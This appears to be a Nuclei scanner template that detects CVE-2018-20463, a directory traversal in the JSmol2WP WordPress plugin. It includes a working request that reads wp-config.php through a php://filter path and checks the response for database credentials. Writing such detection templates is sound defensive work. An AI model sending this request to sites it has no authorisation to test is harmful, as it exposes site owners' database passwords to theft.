id: CVE-2018-20463 info: name: JSmol2WP <= 1.07 - Directory Traversal author: vinit989 severity: high description: | An issue was discovered in the JSmol2WP plugin 1.07 for WordPress. There is an arbitrary file read vulnerability via ../ directory traversal in query=php://filter/resource= in the jsmol.php query string. This can also be used for SSRF. reference: - https://wpscan.com/vulnerability/9197 - https://wordpress.org/plugins/jsmol2wp/ - https://nvd.nist.gov/vuln/detail/CVE-2018-20463 - https://www.cbiu.cc/2018/12/WordPress%E6%8F%92%E4%BB%B6jsmol2wp%E6%BC%8F%E6%B4%9E/#%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96-amp-SSRF classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-20463 cwe-id: CWE-22 metadata: verified: "true" tags: wp,wp-plugin,wordpress,jsmol2wp,wpscan,cve,cve2018,traversal requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php" matchers-condition: and matchers: - type: word part: body words: - "'DB_USER'," - "'DB_PASSWORD'" condition: and - type: word part: header words: - text/plain - type: status status: - 200